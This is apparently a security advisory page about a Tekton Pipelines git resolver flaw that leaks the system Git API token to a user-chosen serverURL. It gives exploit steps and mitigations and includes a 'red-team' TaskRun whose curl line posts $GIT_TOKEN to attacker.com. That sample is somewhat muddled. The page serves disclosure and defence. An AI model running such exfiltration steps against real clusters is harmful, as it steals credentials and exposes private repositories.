Listen to this Post
How the mentioned CVE works
The Tekton Pipelines git resolver in API mode sends the system-configured Git API token to a user-controlled `serverURL` when the user omits the `token` parameter. A tenant with `TaskRun` or `PipelineRun` create permission can exfiltrate the shared API token (e.g., GitHub PAT, GitLab token) by pointing `serverURL` to an attacker-controlled endpoint.
The vulnerability lies in the `ResolveAPIGit()` function in pkg/resolution/resolver/git/resolver.go. When a user provides `serverURL` but omits the `token` parameter:
– `getSCMTypeAndServerURL()` reads `serverURL` directly from user parameters without validation.
– `secretRef` is set to nil.
– `getAPIToken()` is called with nil, which causes the function to populate the token from the system-configured secret.
– `clientFunc()` then creates an SCM client pointed at the attacker-controlled URL, embedding the system token in the `Authorization` header.
– Subsequent API calls (e.g., Contents.Find, Git.FindCommit) carry the system token to the attacker URL.
The impact is critical: the system Git API token is exfiltrated, giving an attacker read access to private repositories containing source code, secrets, and CI/CD configurations.
dailycve form
Platform: Tekton Pipelines
Version: 1.0.0–1.10.0
Vulnerability: Token Exfiltration
Severity: High
date: 2026-04-21
Prediction: 2026-05-05
What Undercode Say:
Analytics:
Check for vulnerable git resolver ConfigMap
kubectl get configmap -n tekton-pipelines-resolvers git-resolver-config -o yaml
Monitor egress traffic to detect exfiltration
kubectl exec -it -n tekton-pipelines-resolvers <pod-name> -- tcpdump -i any -s 0 -w capture.pcap
Simulate malicious TaskRun (red-team only)
cat <<EOF | kubectl apply -f -
apiVersion: tekton.dev/v1beta1
kind: TaskRun
metadata:
name: token-exfil-test
spec:
taskSpec:
steps:
- name: exploit
image: alpine
script: |
curl -X POST -H "Content-Type: application/json" -d '{"token":"'"$GIT_TOKEN"'"}' https://attacker.com/exfil
params:
- name: serverURL
value: https://attacker.com/git
EOF
Exploit:
1. Create a `TaskRun` or `PipelineRun` that uses the git resolver.
2. Set `serverURL` to an attacker-controlled endpoint.
3. Omit the `token` parameter.
- The resolver will send the system-configured Git API token in the `Authorization` header.
5. Capture the token on the attacker server.
Protection from this CVE
- Do not configure a system-level API token in the git resolver
ConfigMap. Instead, require users to provide their own tokens via the `token` parameter. - Restrict `TaskRun` creation to trusted users or service accounts.
- Apply `NetworkPolicy` to the `tekton-pipelines-resolvers` namespace to restrict outbound traffic to known-good Git servers only.
Impact
Successful exploitation allows an attacker to obtain the system Git API token, granting read access to private repositories, source code, secrets, and CI/CD configurations. This can lead to further compromise of the software supply chain and sensitive data exposure.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

